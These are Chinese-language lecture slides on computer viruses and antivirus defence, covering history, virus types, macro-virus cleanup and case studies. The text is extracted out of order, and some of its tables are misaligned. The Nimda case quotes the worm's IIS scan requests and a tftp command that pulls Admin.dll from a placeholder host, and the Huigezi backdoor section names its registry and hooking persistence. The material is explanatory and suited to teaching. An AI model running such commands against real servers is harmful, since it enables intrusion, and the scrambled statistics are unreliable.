网络防病毒

常见DOS病毒分析
1．引导记录病毒 （1）引导型病毒的传播、破坏过程 （2）引导型病毒实例：小球病毒 2．文件型病毒 （1）文件型病毒的类型 （2）文件型病毒的感染方式 （3）.COM文件的感染 （4）.EXE文件的感染 （5）.SYS文件的感染
宏病毒的行为和特征
宏病毒是一种新形态的计算机病毒，也 是一种跨平台式计算机病毒。可以在 Windows、Windows 95/98/NT、OS/2、 Macintosh 等操作系统上执行病毒行为。 宏病毒的主要特征如下： 1）宏病毒会感染.DOC文档和.DOT模板文件。 2）宏病毒的传染通常是Word在打开一个带 宏病毒的文档或模板时，激活宏病毒。
2006年十大病毒
序 号 1 2 3 4 5 6 7 8 9 病毒中文名 “熊猫烧香” 威金蠕虫 传奇窃贼 敲诈者 QQ盗号木马 龌龊虫 灰鸽子后门 工行钓鱼木马 征途木马变种 615901 20351 897592 42838 446450 739169 累计感染计算机 类型 蠕虫 蠕虫 木马 木马 感染系统 Win2000/XP Win9X/2000/XP/NT/Me/2003 Win9X/2000/XP/NT/Me/2003 Win9X/2000/XP/NT/Me/2003 Win9X/2000/XP/NT/Me/2003 Win9X/2000/XP/NT/Me Win9X/2000/XP/NT/Me Windows 2000、Windows XP Win9X/2000/XP/NT/Me Win3X/9X/2000/XP/NT/Me/2003
2008年上半年病毒种类分析
计算机病毒的危害
1、计算机病毒造成巨大的社会经济损失 2、影响政府职能部门正常工作的开展 3、计算机病毒被赋予越来越多的政治意义 4、利用计算机病毒犯罪现象越来越严重
病毒带来的威胁
三、计算机病毒的特征
传染性 破坏性 潜伏性和可触发性 非授权性 隐藏性 不可预见性
第三章
网络防病毒
本章主要内容
Key Questions
计算机病毒的定义 病毒发展史 计算机病毒的特点 病毒分类 计算机病毒的发展趋势 病毒实例 病毒的防护
网络安全防护体系构架
网络安全防护体系构架 网络安全评估
系 统 漏 洞 扫 描
网 络 管 理 评 估 病 毒 防 护 体 系
病毒演示—圣诞节病毒
病毒演示—白雪公主
巨大的黑 白螺旋占 据了屏幕 位置，使 计算机使 用者无法 进行任何 操作！
红色代码
198.137.240.91(www.whitehouse.gov)
病毒发作现象
AIDS
Happy99 Ketapang
幻彩
救护车
Kmpsd
引导型病毒
宏病毒的特点
1．传播极快 2．制作、变种方便 3．破坏可能性极大
宏病毒的防治和清除方法
Word宏病毒，是近年来被人们谈论 得最多的一种计算机病毒。与那些用 复杂的计算机编程语言编制的病毒相 比，宏病毒的防治要容易得多！在了 解了Word宏病毒的编制、发作过程之 后，即使是普通的计算机用户，不借 助任何杀毒软件，就可以较好地对其 进行防冶。
1. 查看“可疑”的宏 2．按使用习惯编制宏 3．防备Autoxxxx宏 4．小心使用外来的Word文档 5．使用选项“Prompt to Save Normal Template”
（工具-选项-保存）
6．查看宏代码并删除 7. 将文档存储为RTF格式 8．设置Normal.dot的只读属性 9． Normal.dot的密码保护 10．使用OFFICE 的报警设置
文件型病毒
文件型病毒的特点是附着于正常程序文件，成为程 序文件的一个外壳或部件。 文件型病毒主要以感染文件扩展名为.com、.exe 和.bat等可执行程序为主。 大多数的文件型病毒都会把它们自己的代码复制到 其宿主文件的开头或结尾处。
计算机病毒引起是异常情况
计算机系统运行速度明显降低 系统容易死机 文件改变、破坏 磁盘空间迅速减少 内存不足 系统异常频繁重启动 频繁产生错误信息
DOS
Windows
Unix
Other
病毒的传播媒介
病毒网络传播方式图例

存储介质 网络
1. 2. 3. 4. 5. 邮件(SoBig) 网页(RedLof) 局域网(Funlove) 远程攻击(Blaster) 网络下载
(数据来源于瑞星病毒样本库)
局域网 9%
远程攻 击 4%
邮件 47%
网页 40%
病毒：Virus
二、计算机病毒的发展史
1、计算机病毒的产生的思想基础和病毒发展 简介 2、实验室中产生——病毒的祖先（磁芯大战） 3、计算机病毒的出现（1983年） 4、我国计算机病毒的出现 （1989年）
病毒的产生原因
（1）编制人员出于一种炫耀和显示自己能力 的目的
（2）某些软件作者出于版权保护的目的而编 制 （3）出于某种报复目的或恶作剧而编写病毒 （4）出于政治、战争的需要
时间 1986-1989
总结 DOS引导阶段 DOS可执行阶段 伴随、批次型阶段
第二代：混合 1989-1991 病毒(超级病毒)
第三代：多态 1992-1995 性病毒
第四代：
幽灵、多形阶段 生成器、变体机阶段 90年代中后 宏病毒阶段 网络、蠕虫阶段
典型的计算机病毒事件
时间 1986 名称 Brain 事件 第一个病毒（软盘引导）
计算机病毒的发展历程
1. DOS引导阶段 2. DOS可执行阶段 3. 伴随阶段 4. 多形阶段 5. 生成器、变体机阶段 6. 网络、蠕虫阶段 7. 视窗阶段 8. 宏病毒阶段 9. 邮件病毒阶段 10. 手持移动设备病毒阶段
时代划分 第一代：传统 病毒
网络化病毒的特点
网络化：传播速度快、爆发速度快、面广 隐蔽化：具有欺骗性（加密） 多平台、多种语言 新方式：与黑客、特洛伊木马相结合 多途径： 攻击反病毒软件 变化快（变种） 清除难度大 破坏性强
蠕虫病毒
通过网络传播的恶性病毒,它具有病毒的一 些共性,如传播性,隐蔽性,破坏性等等,同时 具有自己的一些特征，如不利用文件寄生 （有的只存在于内存中）,对网络造成拒绝 服务，以及和黑客技术相结合等等。
病毒攻击的操作系统
Microsoft DOS Microsoft Windows 95/98/ME Microsoft Windows NT/2000/XP Unix(Linux) 其他操作系统
病毒攻击的操作系统图例
(数据来源于瑞星病毒样本库)
Unix 3%
Other 1%
DOS 43% Window s 53%
1987
1988.11.2 1990.1 1991 1991
黑色星期五
蠕虫病毒 “4096”
病毒第一大规模爆发
第一个蠕虫计算机病毒 发现首例隐蔽型病毒，破坏数 据 病毒攻击应用于战争 第一个格式化硬盘的开机型病 毒
米开朗基罗
1992
VCL- Virus Creation Laboratory
病毒生产工具在美国传播
2003.8.11
冲击波
集中了所有蠕虫传播途径
2006年十大病毒
2006年出现的新病毒数量急剧增加，达到 234211个，几乎等于以往所有病毒数量的总 和。 这些新病毒，90%以上带有明显的利益特征， 有窃取个人资料、各种账号密码等行为。其 中，窃取用户账号密码等个人虚拟财产信息 的病毒共167387个，占到总病毒数量的 71.47%。这一年，中国还出现了首个勒索病 毒“进程杀手变种”。
安全防护
网 络 访 问 控 制
网络安全服务
应 急 服 务 体 系 安 全 技 术 培 训
网 络 监 控
数 据 保 密
数 据 恢 复
一、计算机病毒的定义
1994年2月18日，我国正式颁布实施了《中 华人民共和国计算机信息系统安全保护条 例》，在《条例》第二十八条中明确指出： “计算机病毒，指编制或者在计算机程序中 插入的破坏计算机功能或者破坏数据，影响 计算机使用并且能够自我复制 的一组计算机 指令或者程序代码 ”。
木马
蠕虫 木马 木马 木马
10 调用门Rootkit
近年新增病毒数量对比
2007年各类病毒/木马比例
2007年十大病毒/木马
数据来源：金山软件发布的《2007年度中国电脑病毒疫情及互联网安全 报告》（2008/1/17）
2008年上半年病毒数量
2008年度上半年十大病毒排行
——FROM：江民科技
病毒名：Backdoor/Huigezi.2005 （灰鸽子2005）
1.病毒运行后，将创建下列文件(安全模式 下查看)： %WinDir%IExplorer.exe，病毒程序 %WinDir%IExplorer.dll, 病毒程序 %WinDir%IExplorer_Hook.dll, 病毒程序
3）多数宏病毒包含AutoOpen、AutoClose、 AutoNew和AutoExit等自动宏，通过这些自动 宏病毒取得文档（模板）操作权。 4）宏病毒中总是含有对文档读写操作的宏命 令。 5）宏病毒在.DOC文档、.DOT模板中以BFF （Binary File Format）格式存放，这是一种 加密压缩格式，每个Word版本格式可能不兼 容。 6）宏病毒具有兼容性。
2.通过修改如下注册表项，将病毒自身添加为服务 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\Power supply management]
3.将IExplorer_Hook.dll注入到系统每个进程中，通 过hook系统函数来达到隐藏自身的目的。
邮件
网页
局域网
远程wk.baidu.com击
病毒的传播和感染对象
感染引导区 感染文件 可执行文件 OFFICE宏 网页脚本（ Java小程序和ActiveX控件） 网络蠕虫 网络木马 破坏程序 其他恶意程序
病毒演示
病毒演示—CIH病毒
病毒演示—彩带病毒
病毒演示—女鬼病毒
病毒演示—千年老妖
时间 1992年9月 1995 1997 1999 1999 2000 2001 2002 2003
名称
事件 首例Windows病毒
FAT病毒、幽灵、 多态性（基于）windows） 变形金刚 宏病毒 CIH Mellisa\happy99 红色代码 Nimda SQLSPIDA.B SQL_slammer 传播方式增加（邮件等） 发现破坏计算机硬件病毒 邮件病毒 黑客型病毒 集中了所有蠕虫传播途径 第一个攻击SQL服务器 利用SQL server数据库的漏洞
• (1)隐藏病毒自身进程，通过任务管理器无法查找到病毒 进程。 • (2)隐藏病毒自身文件，正常模式下查看不到病毒文件。 • (3)隐藏自身添加的服务，使自己从服务列表中消失。
四、计算机病毒有哪些种类？
依据不同的分类标准，计算机病毒可以做不 同的归类。常见的分类标准有： 1. 根据病毒依附的操作系统 2. 根据病毒的传播媒介 3. 根据病毒的传染途径
Nimda--2.利用 IIS、IE 的安全漏洞
CodeRedII会在IIS的几个可执行目录下放置root.exe Nimda首先在udp/69上启动一个tftp服务器然后会作以 下扫描： GET /scripts/root.exe?/c+dir HTTP/1.0 GET /MSADC/root.exe?/c+dir HTTP/1.0 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 …… 一旦发现有弱点的系统就使用类似下面的命令 GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0 把 文 件 传 到 主 机 上 去 ， 然 后 再 GET /scripts/Admin.dll HTTP/1.0
蠕虫病毒与其他病毒的区别
普通病毒 蠕虫病毒
存在形式 传染机制
传染目标
寄存文件 宿主程序运行
本地文件
独立程序 主动攻击
网络计算机
蠕虫病毒的特点
破坏性强 传染方式多 一种是针对企业的局域网，主要通过系统漏 洞；另外一种是针对个人用户的, 主要通过 电子邮件,恶意网页形式迅速传播的蠕虫病毒。 传播速度快 清除难度大
实例：2003蠕虫王
病毒实例——Nimda及解决方案
感染 Win 95/98/NT/2000 系统 1.通过email
在 internet 临 时 文 件 夹 中 读 取 所 有 " htm"， "html" 文 件 并 从 中 提 取 email 地 址 ， 从信箱读取email并从中提取SMTP服务器，然 后发送readme.eml。